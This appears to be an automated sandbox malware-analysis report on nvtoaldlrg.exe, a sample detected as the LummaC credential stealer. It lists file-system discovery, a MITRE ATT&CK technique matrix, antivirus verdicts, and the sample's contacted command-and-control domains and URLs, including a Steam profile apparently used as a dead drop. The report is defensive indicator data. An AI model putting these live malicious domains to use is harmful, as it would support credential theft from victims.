          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: Yara matchFile source: 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: nvtoaldlrg.exe PID: 7128, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: Process Memory Space: nvtoaldlrg.exe PID: 7128, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.nvtoaldlrg.exe.ac0000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		31
          Virtualization/Sandbox Evasion          		2
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		21
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Deobfuscate/Decode Files or Information          		LSASS Memory321
          Security Software Discovery          		Remote Desktop Protocol41
          Data from Local System          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
          Obfuscated Files or Information          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
          Software Packing          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput Capture114
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync31
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          nvtoaldlrg.exe58%VirustotalBrowse
          nvtoaldlrg.exe68%ReversingLabsWin32.Trojan.LummaStealer
          nvtoaldlrg.exe100%AviraHEUR/AGEN.1314134

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.gstatic.cn/recaptcha/0%Avira URL Cloudsafe
          https://guntac.bet:443/bSHsyZDal0%Avira URL Cloudsafe
          https://guntac.bet/0%Avira URL Cloudsafe
          https://latchclan.shop:443/Wjquw100%Avira URL Cloudmalware
          https://bugildbett.top:443/bAuzaMicrosoft100%Avira URL Cloudmalware
          https://citydisco.bet/gd0%Avira URL Cloudsafe
          https://featureccus.shop:443/bdMAn100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          steamcommunity.com
          		104.73.234.102
          		truefalse
            		high
            jowinjoinery.icu
            		188.114.97.3
            		truefalse
              		high
              citydisco.bet
              		188.114.97.3
              		truefalse
                		high
                legenassedk.top
                		188.114.96.3
                		truefalse
                  		high
                  htardwarehu.icu
                  		104.21.48.1
                  		truefalse
                    		high
                    bugildbett.top
                    		104.21.16.1
                    		truefalse
                      		high
                      mrodularmall.top
                      		104.21.96.1
                      		truefalse
                        		high
                        cjlaspcorne.icu
                        		104.21.80.1
                        		truefalse
                          		high
                          guntac.bet
                          		188.114.96.3
                          		truefalse
                            		unknown
                            latchclan.shop
                            		unknown
                            		unknownfalse
                              		high
                              featureccus.shop
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                bugildbett.top/bAuzfalse
                                  		high
                                  citydisco.bet/gdJISfalse
                                    		high
                                    mrodularmall.top/aNzSfalse
                                      		high
                                      https://steamcommunity.com/profiles/76561199822375128false
                                        		high
                                        jowinjoinery.icu/bdWUafalse
                                          		high
                                          htardwarehu.icu/Sbdsafalse
                                            		high
                                            https://citydisco.bet/gdJISfalse
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://player.vimeo.comnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://steamcommunity.com/profiles/76561199822375128euMnvtoaldlrg.exe, 00000000.00000003.922358612.00000000014F9000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://steamcommunity.com/?subsection=broadcastsnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://steamcommunity.com/System32nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://store.steampowered.com/subscriber_agreement/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.gstatic.cn/recaptcha/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://steamcommunity.com/profiles/76561199822375128/badgesnvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://steamcommunity.com/profiles/76561199822375128/inventory/nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.valvesoftware.com/legal.htmnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.youtube.comnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.comnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://guntac.bet:443/bSHsyZDalnvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbacknvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994617580.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044B3000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&l=envtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/nvtoaldlrg.exe, 00000000.00000002.1048162417.00000000044A2000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&amnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&amnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCnvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://s.ytimg.com;nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://steamcommunity.com/=M:PAnvtoaldlrg.exe, 00000000.00000003.923852702.00000000014F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=englinvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://steam.tv/nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=ennvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://steamcommunity.com/profiles/7656119982nvtoaldlrg.exe, 00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://store.steampowered.com/privacy_agreement/nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044DB000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045687411.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045441184.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046918483.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047024427.000000000151E000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044C7000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048252866.00000000044C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://store.steampowered.com/points/shop/nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:nvtoaldlrg.exe, 00000000.00000003.889801356.00000000047CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&anvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://sketchfab.comnvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
